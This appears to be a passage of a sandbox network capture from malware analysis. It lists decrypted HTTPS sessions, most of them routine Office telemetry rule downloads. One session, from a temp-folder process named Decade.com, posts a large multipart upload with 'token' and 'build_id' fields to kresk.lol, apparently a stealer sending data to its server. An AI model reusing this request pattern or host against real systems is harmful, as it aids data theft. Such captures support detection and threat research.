6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:42 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:42 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 76609676-a01e-0070-74cc-45573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111742Z-1746fd949bdjrnwqhC1EWRpg280000000180000000002hys x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:42 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:42 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:43 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:42 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 1a13e7cb-001e-0049-3bcd-455bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111742Z-1746fd949bd6zq92hC1EWRry480000000130000000004xb0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:43 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:42 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:44 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111744Z-1746fd949bdtlp5chC1EWRq1v4000000015g0000000012w0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:44 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49866	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:43 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58YU37G4OZU37YUAS2NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------58YU37G4OZU37YUAS2NYCont
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:43 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:44 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:44 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: c77b1400-401e-0048-71d2-450409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111744Z-1746fd949bdnq7x2hC1EWRpxr00000000110000000002669 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:44 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:44 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:44 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:44 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111744Z-1746fd949bdzd2qvhC1EWRcygw00000000t00000000071um x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:44 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49869	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:44 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:45 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:44 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: d3398a04-c01e-007a-0bce-45b877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111744Z-1746fd949bdlqd7fhC1EWR6vt00000000190000000005058 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
